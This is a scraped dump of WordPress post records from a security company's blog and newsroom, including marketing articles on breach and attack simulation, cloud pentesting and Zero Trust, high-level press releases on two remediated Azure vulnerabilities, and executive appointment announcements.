With comprehensive breach and attack simulation services, findings are delivered with descriptions, procedures, and recommendations based on expert human analysis. Actionable insights are also available to track and trend your security posture, benchmark against industry competitors, and measure ROI, which can help make the case for an expanded security budget.
Examples of Breach and Attack Simulation from Gartner
As threats rapidly evolve, breach and attack simulation vendors continue to improve and expand their technology, features, and scope. While BAS has a wide range of use cases, some common examples Gartner listed include:
Complete an attack simulation procedure to better understand gaps in an organization’s security defenses and identify actionable steps to improve security controls
Gain an attacker’s outside perspective of an organization’s environment and systems
Work in partnership with red teams to run BAS procedures using the methods and approach of real adversaries in a controlled environment
Leverage findings from the simulation to flag top risks and vulnerabilities, and identify actionable steps for remediation
Quick Guide to Evaluating Breach and Attack Simulation Vendors
Several breach and attack simulation services are available on the market and selecting a partner with advanced technology and a team of proven security experts is critical to protecting against the latest threats. Review the key criteria below to take into consideration when assessing different breach and attack simulation vendors:
A single, centralized platform to consolidate and organize relevant data
Capabilities for BAS services to be automated, consistent, and continuous
White-glove service and communication available throughout the engagement from experienced, trained professionals
Customizable procedures to gain an attacker’s view of your environment at scale
Seamless user experience (UX) and user interface (UI) for both expert and novice users
Extensive, consistently updated security plays and playbooks, that enable organizations to better strengthen security posture
Real-time, actionable data to identify trends and coverage gaps, benchmark security posture against competitors, measure ROI of security investments, and prioritize remediation efforts
Test your security controls with NetSPI’s Breach and Attack Simulation
Protecting your business effectively against security threats requires a reputable, expert partner. For more than 20 years, NetSPI’s global cybersecurity experts have been trusted partners in securing the world’s most prominent organizations.
NetSPI’s Breach and Attack Simulation enables organizations to create and execute customized procedures utilizing purpose-built technology. Professional human pentesters simulate real-world attacker behaviors, not just indicators of compromise (IOCs), putting your detective controls to the test in a way no other BAS solution can.
With the combination of the AttackSim cloud-native technology platform and personalized counsel from NetSPI’s manual testing teams, your organization can build resilience against ransomware, denial of service, data loss, fraud, information leaks, and more.
[post_title] => What You Need to Know about Breach and Attack Simulation
[post_excerpt] => Breach and Attack Simulation from NetSPI puts any detective controls to the test by continuously simulating real-world attack behaviors.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => what-you-need-to-know-breach-and-attack-simulation
[to_ping] =>
[pinged] =>
[post_modified] => 2023-04-05 15:53:29
[post_modified_gmt] => 2023-04-05 20:53:29
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29878
[menu_order] => 63
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[37] => WP_Post Object
(
[ID] => 29818
[post_author] => 91
[post_date] => 2023-03-30 08:00:00
[post_date_gmt] => 2023-03-30 13:00:00
[post_content] =>
NetSPI VP of Research finds cross-tenant compromise in popular Azure automation tool, works closely with Microsoft to remediate the issue.
Minneapolis, MN – NetSPI, the leader in offensive security, today disclosed the threat research findings of Vice President of Research Nick Landers who discovered and reported a cross-tenant compromise in Power Platform Connectors, a first party provider hosted in Microsoft Azure.
In close collaboration with NetSPI, Microsoft quickly fixed the issue. Due to the cross-tenant implications of this vulnerability, if it were left unresolved, malicious attackers could have jumped between tenants using the Power Platform Connectors backend and gained access to sensitive data, Azure access tokens, and more.
As background, Azure features a large suite of automation tools, including Logic Apps and the Power Platform. On-Prem Data Gateways extend these automation tools, allowing actions to be carried out by a connected agent installed locally in customer networks – which is where Landers found the vulnerability. Originally, these gateways were intended for personal use only, but users can also connect them to an Azure tenant and make them available to the larger subscription. In Landers’ research, he inspected how these Logic Apps interact with data gateways and discovered remote code execution opportunities on both the gateways themselves and the supporting Power Platform Connectors hosted in Azure, allowing for the compromise of cross-tenant data.
“This vulnerability is yet another example of just how pervasive deserialization flaws continue to be, especially for large technology vendors like Microsoft,” explains Landers. “Security teams should be aware of deserialization-based vulnerabilities, assume most connected systems and apps are exploitable, and understand that the simple exploitation might be buried in a bit of technical complexity. I welcome the research community to join me in continued deserialization research as we work to make cross-tenant environments more secure.”
Landers worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the issue. As a resolution, the Power Platform team completely rebuilt their serialization binder to enforce stricter whitelists, while creating distinct binders for both gateway and cloud environments.
NetSPI is the leader in enterprise penetration testing, attack surface management, and breach and attack simulation – the most comprehensive suite of offensive security solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and the top 50 companies in the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India.
[post_title] => NetSPI Uncovers Cross-Tenant Azure Vulnerability in Power Platform Connectors
[post_excerpt] => Learn how NetSPI VP of Research found a cross-tenant compromise in popular Azure automation tool and worked with Microsoft to remediate the issue.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => azure-vulnerability-power-platform-connectors
[to_ping] =>
[pinged] =>
[post_modified] => 2023-03-29 14:14:44
[post_modified_gmt] => 2023-03-29 19:14:44
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29818
[menu_order] => 66
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[38] => WP_Post Object
(
[ID] => 29770
[post_author] => 91
[post_date] => 2023-03-28 09:00:00
[post_date_gmt] => 2023-03-28 14:00:00
[post_content] =>
Blockchain is an effective business strategy that extends beyond the buzz of cryptocurrencies. Businesses are using blockchain for real-time transactions and secure payments at scale. Blockchain deployments vary for every organization, but its many uses and successes so far make it a technology to keep researching.
Planning for cybersecurity at the beginning of blockchain exploration helps create more secure deployments, especially when working with valuable financial information. The six questions below can guide internal conversations to align resources around secure blockchain deployments. Get more blockchain security tips in our eBook, “5 Blockchain Security Fundamentals Every C-Suite Needs to Know.”
Definition of Blockchain, or Distributed Ledger Technology (DLT)
Distributed Ledger Technology (DLT), commonly known as “blockchain” is a distributed database secured with cryptography. How this unfolds in reality has many interpretations. One commonality runs through every blockchain use: every participant has a vested interest in the trustworthiness of the data. This creates an environment for secure transactions after servers, or nodes, work together to establish the real state of a database.
“Blockchain is fundamentally a distributed database secured with cryptography.”
One example of blockchain is smart contracts. They act as web applications stored directly on the chain and operate deterministically without requiring an entity to execute the code. Smart contracts allow responsible parties to communicate information including transactions without the use of an intermediary.
The many unique use cases of blockchain give it vast appeal, but it may be particularly useful in industries such as large financial institutions and retail groups.
Blockchain Security in Deployments
Much of the data handled with blockchain is considered sensitive, therefore making it valuable to malicious actors. As with many newer technologies, vulnerabilities can become an issue if security is not baked in from the start.
“Like any other technology, security flaws are typically discovered/introduced during integration, as opposed to being inherent to the technology itself.”
Blockchain security issues can emerge from container configurations, vulnerable contract code, or weak permission models to name a few. Exploring blockchain uses through a cybersecurity lens puts organizations ahead of weaknesses or gaps before vulnerabilities occur.
6 Questions to Prioritize Blockchain Security
These guiding questions will help uncover expectations and requirements as companies continue blockchain research. Use these as a starting point to gain alignment between IT and security teams, as well as other internal departments who may be affected by blockchain use.
Are teams in my organization pursuing blockchain uses? Have they consulted the security team for potential risks? Do we have trusted providers in place for third-party blockchain pentesting? Are we rushing the development of DLT solutions without proper security processes in place?
What chain technologies are going to be part of our deployments? Are these chains public/permissionless chains like Ethereum or Bitcoin? Or do we want to work with a permissioned chain system like Hyperledger?
Are we developing or deploying smart contracts? Do we have a secure SDLC process developed for DLT? Is our development team properly trained in the security considerations of the chain? How will we support contract updates and security fixes? Do we have code audit plan in place?
Are we running our own nodes as part of the chain use? Will these be deployed on-premises, in Azure/AWS, or via a managed provider like IBM or Oracle? Have we considered configuration reviews for the supporting containers and hosts? Do we have threat models for other malicious nodes on the chain? Have we considered supply-chain threats for the code base?
Are we performing any custodial or direct ownership of digital assets? Is transaction signing and logic part of our solution? How are we securely managing cryptographic keys? Do we have key recovery process in place? Are we relying entirely on third party APIs to access the chain?
Are we integrating with any off-chain assets (databases, APIs, etc.)? Have we mapped out threat scenarios related to state-desynchronization? Are we properly leveraging the native security of chain transactions for key logic? Are we storing sensitive data on the chain?
Make Blockchain Security Part of Your Strategy
The goal of DLT is to create a shared database which can be trusted by multiple entities who don’t necessarily trust one another. Blockchain is the answer to this challenge, but it's a newer technology with its full potential still being realized.
[post_title] => 6 Questions to Plan for Blockchain Security
[post_excerpt] => These six questions will help teams plan for blockchain security from the start to get ahead of potential gaps that can result in vulnerabilities.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => blockchain-security
[to_ping] =>
[pinged] =>
[post_modified] => 2023-03-27 15:22:53
[post_modified_gmt] => 2023-03-27 20:22:53
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29770
[menu_order] => 67
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[39] => WP_Post Object
(
[ID] => 29763
[post_author] => 91
[post_date] => 2023-03-23 08:00:00
[post_date_gmt] => 2023-03-23 13:00:00
[post_content] =>
Cloud penetration testing leader identifies privilege escalation flaw in Azure’s popular solution for building cloud-native applications.
Minneapolis, MN – NetSPI, the leader in offensive security, today published details on a vulnerability found by Vice President of Research Karl Fosaaen, who discovered a flawed functionality in Azure Function Apps that allowed for privilege escalation.
Fosaaen and the NetSPI research team worked closely with Microsoft to resolve the issue. If left unresolved, users with ‘read only’ permissions on a Function App could gain full access to the Azure Function App container, granting them the ability to view and alter highly sensitive information, like backend code databases and password vaults.
Function Apps is used for building cloud-native applications in Azure. At its core, Function Apps is a lightweight API service that can be used for building and hosting serverless applications. The Azure Portal allows users to view files associated with the Function App, along with the code for the application endpoints.
“We see the Function Apps service used in about 80 percent of our penetration testing environments. With this being a privilege escalation issue, a minimally authorized user could have been given access to critical, often restricted roles that would allow them to pivot within an Azure subscription,” said Fosaaen. “Given the simplicity of the issue, it’s surprising that this vulnerability has made it this far without previously being detected, especially with the rise in APIs and cloud-native apps over the past few years.”
https://youtu.be/ClCeHiKIQqE
Fosaaen worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the file access issues. The Reader role no longer has the ability to read files with the Function App VFS APIs. A technical overview of the vulnerability can be found on the NetSPI blog.
The NetSPI Labs innovation and research group plans to continue exploring read-only privilege escalation opportunities across Azure. You can see the team’s cloud security research and past vulnerability disclosures at www.netspi.com.
About NetSPI
NetSPI is the leader in enterprise penetration testing, attack surface management, and breach and attack simulation – the most comprehensive suite of offensive security solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and the top 50 companies in the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India.
Cloud computing has transformed the way organizations operate, providing unparalleled flexibility, scalability, and cost-efficiency. However, with these benefits come new security challenges and emerging risks. As organizations increasingly move their operations to the cloud, ensuring the security and privacy of data has become more critical than ever. A robust cloud penetration testing program helps internal IT teams protect their organizations by identifying and mitigating security risks in the cloud.
A pitfall organizations face when building a cloud pentesting strategy is handling rapid cloud migration. An application hosted on-prem will have significantly different security requirements from one in the cloud. Cloud security controls can often be more complex with intricate nuances. Another pitfall is assuming that cloud services are secure by default. Even though the cloud provider manages some aspects around security, organizations still have a responsibility to understand what exactly is within their control to secure. Sometimes the default settings from the cloud provider are not always the most secure for every environment. This differs from a traditional security program because of the shared responsibility or "shared fate" model.
With this model in mind, organizations need to look at the key components of a comprehensive cloud penetration testing program in light of their business objectives to implement a secure cloud effectively.
Best Practices to Create a Cloud Penetration Testing Program
Creating a secure cloud is a complex undertaking with decisions that need to be tailored to your business goals and tech stack. Thomas Elling and the Cloud Pentesting team have compiled three aspects of creating a cloud pentesting program that will help any team incorporate security protocols from ideation to deployment.
1. Building a secure cloud from the start
Making security-conscious design decisions from the start of a cloud adoption helps IT teams avoid retroactive decisions that result in rework and disjointed integration of technologies. It’s important to consider this from a human element and a technical one. For example, from the human lens, consider partnering security engineers and pentesters with DevOps groups to create secure by default environments. Whereas from a technical standpoint, consider using Infrastructure as Code (IaC) adoption to help enforce a security baseline.
2. Performing regular configuration reviews and pentesting
Regular configuration reviews and cloud pentesting exercises are extremely valuable because of their ability to focus remediation efforts on prioritized vulnerabilities. Identifying security misconfigurations is a critical first step to securing an environment, which makes configuration reviews so imperative. They should be done on a regular basis to identify factors such as inadvertent public access or excessive IAM permissions.
Pentesting is another integral part of cloud security which aims to demonstrate the impact of the identified misconfigurations. This often includes chaining misconfigurations together to prove privilege escalation. The key difference between this and a typical configuration review is the fact that pentests leverage misconfigurations to demonstrate the potential impact of a successful attack. Oftentimes, the full impact of a misconfiguration is not fully understood until it is paired with one or more other vulnerabilities in the environment.
3. Establishing security guardrails
Guardrails are sets of automated policies and controls that are designed to prevent or mitigate security risks and ensure compliance with security standards and regulations. Results of configuration reviews and pentests should always be discussed to identify the root cause. If a vulnerability was introduced via configuration drift, one preventative action would be implementing a security guardrail to ensure that misconfigurations cannot be introduced in the future.
Whether your cloud infrastructure resides in AWS, Azure, or GCP, these three fundamentals will help internal teams build — and maintain — a secure cloud from all angles.
Refine Your Cloud Pentesting Program with NetSPI
These steps represent some of the basic ways to create a security-first cloud environment through regular review processes. While there is no one-size-fits-all approach, these points can be modified to fit any cloud environment. Ultimately, organizations should prioritize remediation of vulnerabilities with a risk-based approach.
Environments that carry higher risk, such as ones that deal with sensitive data or may have external exposure, would be candidates for more frequent reviews. One factor that could trigger a review is any fundamental change made by the cloud provider to a core service.
However, this is not to say that lower risk environments, like a dev environment with test data, is not important. Escalation paths from dev environments into production can be extremely impactful. Lastly, organizations looking to build out and strengthen their cloud pentesting programs need to investigate the root cause of identified vulnerabilities in order to ensure that the same, or similar, issues do not happen again.
Working with a penetration testing partner to enhance cloud security can help streamline efforts and deliver value quickly. As a leader in offensive security, NetSPI helps companies establish and enhance their secure cloud strategies. Contact our security consultants to get started on a strong cloud penetration testing program.
[post_title] => 3 Fundamentals for a Strong Cloud Penetration Testing Program
[post_excerpt] => The cloud reigns supreme, making it a target for threat actors. Learn the basics of creating and enhancing a secure cloud penetration testing program.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => cloud-penetration-testing-program
[to_ping] =>
[pinged] =>
[post_modified] => 2023-03-20 15:46:28
[post_modified_gmt] => 2023-03-20 20:46:28
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29724
[menu_order] => 70
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[41] => WP_Post Object
(
[ID] => 29699
[post_author] => 91
[post_date] => 2023-03-14 09:00:00
[post_date_gmt] => 2023-03-14 14:00:00
[post_content] =>
NetSPI Field Chief Information Security Officer (CISO) and host of the Agent of Influence podcast, Nabil Hannan invited Senior Compliance Manager at Secureframe Marc Rubbinaccio on episode 53 to discuss how security fits into compliance, and vice versa.
The conclusion? Compliance doesn’t equate to security, but it is a strong starting point. Cybersecurity compliance provides a trustworthy baseline to establish a more mature security posture, especially for companies that are beginning to build their cybersecurity program from the ground up.
Dive into the highlights below, then head over to Agent of Influence and listen to the full episode.
Reframing the Mentality of Cybersecurity Compliance
The sentiment around compliance often centers around meeting requirements, not building an effective security program — but Marc offers a refined perspective. He poses that this mentality may be more prevalent at enterprise organizations with advanced security processes, making the baseline security controls outlined in compliance more of a check-the-box exercise, as opposed to a preventative cybersecurity strategy.
But following the baseline security controls outlined in security frameworks is a prime starting point for small businesses and growing organizations.
Technology is evolving faster than compliance can keep up with, which has led to the PCI DSS council allowing a more customized approach to meeting requirements. This allows companies to keep their current systems and implementations in place, without the need to invest in expensive new technologies. If companies can prove what they’ve implemented meets the intent of the requirement, then these revised standards within PCI DSS v4.0 allow security teams to stay course.
Choosing a Security Compliance Framework
Common company activity that requires cybersecurity compliance includes storing, processing and transmitting data in a way that can impact the security of customer information. Marc advises listeners to first select a cybersecurity framework that could be required within their industry. For example, HIPAA for healthcare, or GDPR for organizations responsible for the privacy of European customer data. Choosing a security framework and sticking to it helps guide decisions throughout the many steps within a compliance journey.
“In my opinion, SOC2 and ISO27001, these frameworks are an amazing way for startups and small businesses to build a baseline security posture that they can not only be proud of but also be confident that their customers’ data is indeed secure.”
Marc Rubbinaccio, Secureframe
Marc recommends two frameworks for organizations starting their path toward cybersecurity compliance:
SOC2: The American Institute of Certified Public Accountants (AICPA) centers SOC 2 framework around five Trust Services Criteria: security, availability, processing integrity, confidentiality, and privacy.
ISO 27001: The International Organization for Standardization (ISO), in partnership with the International Electrotechnical Commission (IEC) developed ISO 27001 as the latest standard to continue handling information security. ISO 27001 encourages the adoption of an Information Security Management System to protect the confidentiality, integrity, and availability of information.
These well-known security frameworks help organizations establish policies and procedures, access control, change management, and even risk management, resulting in an inherently stronger cybersecurity posture.
Changes to PCI DSS v4.0
Marc’s area of focus is PCI DSS, which recently released an updated version, PCI 4.0. Changes include stricter multifactor authentication and stronger password security requirements, among others. The organizations most impacted by these changes are the ones maintaining Self Assessment Questionnaires type A (SAQ A), which is used when merchants outsource all aspects of payment processing to a third-party service provider, such as capturing, storage, transmission of cardholder data.
These changes were driven by the increase in e-skimming attacks on payment pages, a technology used to intercept the input of private information into a web form. To help combat these increasing attacks, SAQ A now requires controls around any script executed in the customer’s browser in addition to external vulnerability scanning.
With all of these never-ending changes, what can internal IT teams do to keep up with security compliance?
“The strongest and most powerful tool you have are the experts that you work with.”
Marc Rubbinaccio, Secureframe
How Organizations Can Prepare for Changes to Security Compliance
Keeping up with all the changes to compliance standards is difficult, which is why leaning on the people and tools around you are essential. When looking at best practices for keeping up with changes to security compliance, use your connections as a resource.
Whether your organization partners with a third-party, or uses a particular auditor, you can lean on these experts for guidance on decisions to adhere to your chosen framework. It's OK to reach out directly to your auditor to discuss the latest changes to the frameworks and how they may affect your environment as it stands today. These conversations will put you ahead of the game when it’s time for your next audit.
The Intersection of Pentesting and Security Compliance
Penetration testing is critical in vulnerability management programs because penetration testing takes vulnerability scanning a step further. Scanners perform fingerprinting against operating system and software versions compared to publicly released vulnerable versions, in addition to fuzzing, or mass-injecting data to discover vulnerabilities within input fields. They are a great tool for identifying assets and surface level vulnerabilities, while pentesting uses the data found by scanners to try and exploit a vulnerability and continue to pivot within your environment.
The additional steps performed by penetration testing help internal teams discover deeper issues within their environment, prioritize risks and remediate gaps. Compliance frameworks have picked up how important pentests are, with some of them requiring penetration testing annually and when significant changes occur, including PCI, FedRAMP, and HITRUST.
Compliance doesn’t equate to security, but these well-known frameworks are a strong starting point. Keep growing your security compliance education by listening Marc’s podcast episode here.
[post_title] => How to Build a Baseline Cybersecurity Posture with Security Compliance
[post_excerpt] => Compliance manager Marc Rubbinaccio joins NetSPI to discuss how a secure environment and security compliance go hand-in-hand.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => baseline-cybersecurity-posture-security-compliance
[to_ping] =>
[pinged] =>
[post_modified] => 2023-06-22 18:31:32
[post_modified_gmt] => 2023-06-22 23:31:32
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29699
[menu_order] => 71
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[42] => WP_Post Object
(
[ID] => 29580
[post_author] => 91
[post_date] => 2023-03-07 09:00:00
[post_date_gmt] => 2023-03-07 15:00:00
[post_content] =>
On Episode 46 of NetSPI’s Agent of Influence podcast, host and NetSPI Field Chief Information Security Officer (CISO) Nabil Hannan invited Hudl CISO Rob LaMagna-Reiter to discuss a future-focused approach to Zero Trust. They cover three misconceptions IT teams typically encounter throughout Zero Trust implementation, as well as broader topics including the definition of Zero Trust, reputable frameworks to reference, and long-term budgeting for an enhanced cybersecurity strategy. Read the recap below for the top takeaways, then head over to our podcast page to listen to the full episode.
3 Misconceptions of Zero Trust Implementation
One of the conversations on this episode centered around common misconceptions teams face when they plan for Zero Trust. The modern cybersecurity model presents universal challenges on the path to a greater end state of cybersecurity that can stall organizations on their progress. Help internal teams move beyond these common blockers and continue momentum on security initiatives by learning about the counterpoints to Zero Trust misconceptions.
Misconception #1: Zero Trust is identity, or Zero Trust is the new perimeter.
Truth: Identity is an important aspect of Zero Trust, but no singular pillar comprises Zero Trust.
The chatter around Zero Trust is dense, leading to mixed messages around what Zero Trust is and isn’t. Vendors can perpetuate this confusion by labeling products as Zero Trust or selling a one-and-done solution that promises relentless security. While identity is an important pillar in Zero Trust, it is only one aspect of the overarching strategy. Having too narrow a focus on a singular pillar leaves gaps in Zero Trust implementation, keeping your company at the crosshairs of a potential breach.
https://youtube.com/shorts/91TPs4HGww0
Misconception #2: Zero Trust is a product.
Truth: Zero Trust is a methodology to achieve a greater end state of cybersecurity.
Again, the varied messages about Zero Trust from vendors who sell a single solution dilute its meaning as an overall strategy. Zero Trust is not a product or a platform, and no single solution can achieve Zero Trust. It is a framework for organizations to approach more secure systems and align their internal thinking to systematiclly enhance security across many areas of a business.
Misconception #3: Zero Trust is a complicated dream state that isn’t possible to achieve.
Truth: Taking incremental steps toward Zero Trust by following a roadmap tailored to your organization decreases the intimidation of Zero Trust and provides quick wins to build momentum for continued progress.
This is the most common misnomer we hear in conversations. Zero Trust is complex, and when trying to solve for everything at once, it can seem overwhelming. Following a Zero Trust roadmap with relevant KPIs tailored to your organization is the key to success. This can include mapping out data flows, the attack surface, and building a strategy around identifying, classifying, and tagging critical applications.
“The most complicated thing about Zero Trust is it actually forces you to understand your business deeply. It forces you to know more about the business than the business might know about itself.”
– Rob LaMagna-Reiter, CISO at Hudl
While many misconceptions about Zero Trust exist, these three examples present nearly universal scenarios for any company aspiring to implement Zero Trust or continue its expansion. Zero Trust is a complex methodology, but internal teams can find support by partnering with technology vendors who specialize in cybersecurity.
Plan for Zero Trust Implementation Guidance Tailored to Your Business Goals
Zero Trust implementation uncovers what is normal and what isn’t for any business. This deep understanding allows for the creation of a strategy to guide the development of steps within Zero Trust, while remaining flexible to adapt to the business as it evolves.
Listen to the full interview on episode 46 of the Agent of Influence podcast where we expand on how to talk with internal stakeholders about Zero Trust in ways that resonate with them. If you’re ready to make progress on your Zero Trust implementation, contact NetSPI’s Strategic Advisory team to get started.
[post_title] => 3 Misconceptions with Zero Trust Implementation
[post_excerpt] => Zero Trust implementation is different for every company, but these common misconceptions present universal scenarios most teams face.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => misconceptions-zero-trust-implementation
[to_ping] =>
[pinged] =>
[post_modified] => 2023-05-18 12:54:07
[post_modified_gmt] => 2023-05-18 17:54:07
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29580
[menu_order] => 73
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[43] => WP_Post Object
(
[ID] => 29570
[post_author] => 91
[post_date] => 2023-03-06 08:00:00
[post_date_gmt] => 2023-03-06 14:00:00
[post_content] =>
Seasoned cybersecurity and finance executives Vinay Anand and Jay Golonka will guide product and growth strategies for the offensive security leader.
Minneapolis, MN – NetSPI, the leader in offensive security, today announced two C-Suite leadership appointments, Chief Product Officer (CPO) Vinay Anand and Chief Financial Officer (CFO) Jay Golonka. They bring decades of experience supporting high-growth technology companies and will be instrumental in leading NetSPI’s technology growth.
"These appointments signal pivotal transformation for NetSPI, as we continue to evolve our technology platforms to meet the offensive security needs of the modern enterprise," said Aaron Shilts, CEO at NetSPI. "Vinay and Jay will play a key role in delivering the highest quality security solutions at-scale and maintaining profitable growth."
Anand is a seasoned technology leader, most recently supporting Palo Alto Networks’ Prisma Cloud as VP of Product. He will oversee NetSPI’s product strategy across the entire portfolio of offensive security solutions. This includes Penetration Testing as a Service (PTaaS), Attack Surface Management (ASM), and Breach and Attack Simulation (BAS), along with future, complementary technology investments. Over the last 20 years, he has led product strategy, engineering, marketing, and business development for a variety of security, software, and networking products. He has held leadership roles with Anthos, Google’s managed hybrid cloud platform, as well as IBM Security, McAfee, and Cisco Systems.
"The need to enable enterprise security professionals to accurately assess their risks in real time has never been more urgent and necessary," said Anand. "NetSPI is uniquely positioned to deliver on this mandate with their platform driven, human delivered methodology. I’m excited to join the team as their first Chief Product Officer to continue the momentum they’ve built bringing high-value, high-fidelity solutions to the industry."
Golonka brings over 25 years of experience leading high performing finance teams through periods of rapid growth. At NetSPI he will focus on scaling the team and providing actionable business insights across the organization. Previously, Golonka was the CFO at PE-backed software company Prometheus Group. During his time there, he led them through nine acquisitions. Jay spent 18 years in public accounting and had finance leadership positions at two other high-growth software companies before joining Prometheus Group. Over his career, he has worked with organizations as they navigate the public company environment, including organizations going through the formal IPO process.
"I was immediately aligned with NetSPI’s vision to expand the breadth and scale of their solutions," said Golonka. "They’ve experienced incredible growth by providing impactful solutions to real problems in the industry – and show no signs of stopping. I look forward to being a contributing part of the journey."
NetSPI is the leader in enterprise penetration testing, attack surface management, and breach and attack simulation – the most comprehensive suite of offensive security solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India.
Veteran security industry executives appointed to support offensive security leader’s next stage of growth.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and offensive security, today announced the appointment of Scott Lundgren and John Spiliotis to its Board of Directors. The two veteran security industry executives will help support the company’s next stage of growth following a year of record momentum.
“We’re honored to have Scott and John join our Board during such an exciting, pivotal time for NetSPI,” said Aaron Shilts, CEO of NetSPI. “Their proven track records of building and advising high-growth cybersecurity companies, combined with their passion for empowering the next generation of business leaders, will be invaluable as we continue to innovate and scale.”
With over two decades of technology and security industry experience, Lundgren currently serves as the Chief Technology Officer at VMware Carbon Black. Having taken the journey with Carbon Black as a founding member, through IPO in 2018, and the VMware acquisition in 2019, he brings a long history of balancing technology requirements under the pressure of rapid business growth. Lundgren has a foundational understanding of offensive security, beginning his cybersecurity career penetration testing for the U.S. Air Force.
“Penetration testing is an area of security that benefits from the underlying expertise of the team and the rigor in which the work is performed and communicated,” said Lundgren. “NetSPI has built an incredible team of offensive security experts, with a hands-on, customer-first approach that stands out in the industry. I look forward to being part of NetSPI’s growth story.”
Spiliotis currently serves as a sales and go-to-market (GTM) advisor with NetSPI investor KKR. Prior to his advisory engagement with the global investment firm, he held several executive sales positions with high-growth technology companies, most recently serving as the Senior Vice President of Sales at Palo Alto Networks. Spiliotis also serves on the Board of Directors for ReliaQuest and is a GTM advisor for various other cybersecurity companies.
“Two years ago, I was introduced to NetSPI through KKR’s Next-Generation Technology growth portfolio. Immediately, they impressed me with their momentum, energy, and value proposition,” said Spiliotis. “NetSPI has the right ingredients to continue achieving massive success. I’m honored to join the Board, where I’ll continue to help NetSPI maximize its opportunity and support employee development in the sales organization alongside the leadership team and my partners at KKR.”
NetSPI is the leader in enterprise penetration testing and attack surface management. Today, NetSPI offers the most comprehensive suite of offensive security solutions – penetration testing as a service, attack surface management, and breach and attack simulation. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world's most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers and e-commerce companies, and 50 percent of the Fortune® 50. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India. Follow NetSPI on Twitter and LinkedIn.
[post_title] => NetSPI Appoints Scott Lundgren and John Spiliotis to its Board of Directors
[post_excerpt] => Carbon Black founding member and KKR advisor join the NetSPI Board of Directors to support the company’s next stage of growth.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => board-of-directors-appointments
[to_ping] =>
[pinged] =>
[post_modified] => 2023-02-20 13:37:27
[post_modified_gmt] => 2023-02-20 19:37:27
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29454
[menu_order] => 80
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[45] => WP_Post Object
(
[ID] => 29370
[post_author] => 91
[post_date] => 2023-02-14 08:00:00
[post_date_gmt] => 2023-02-14 14:00:00
[post_content] =>
In this overview of 36 notable vendors, Forrester explores the benefits of External Attack Surface Management (EASM) and key functionalities to consider when selecting a partner.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management is recognized in The External Attack Surface Management Landscape, Q1 2023, authored by global research and advisory firm Forrester. The Landscape report aims to help organizations understand the value of EASM solutions and provides security professionals with an overview of notable vendors so they can select a solution based on their needs.
“The attack surface management market has seen incredible innovation and evolution. This report examines the benefits EASM brings to global enterprises – increased asset visibility, continuous pentesting, and better risk prioritization, to name a few,” said Jake Reynolds, Head of Emerging Technology at NetSPI. “We believe we play an important role in this market and are honored to be recognized by Forrester.”
In the report, Forrester defines EASM as “tools or functionalities that continually scan for, discover, and enumerate internet-facing assets, establish the unique fingerprints of discovered assets, and identify exposures on both known and unknown assets.” EASM vendors recognized alongside NetSPI all have varying features and use cases.
As mentioned in the research, NetSPI reports that its Attack Surface Management (ASM) solution is selected by clients for most or all of the use cases identified by Forrester. Forrester’s complete list of included use cases is:
Asset discovery
Asset inventory management
Vulnerability risk management
Cloud security posture management
Mergers and acquisitions (M&A) due diligence assistance
Supply chain/third-party risk management
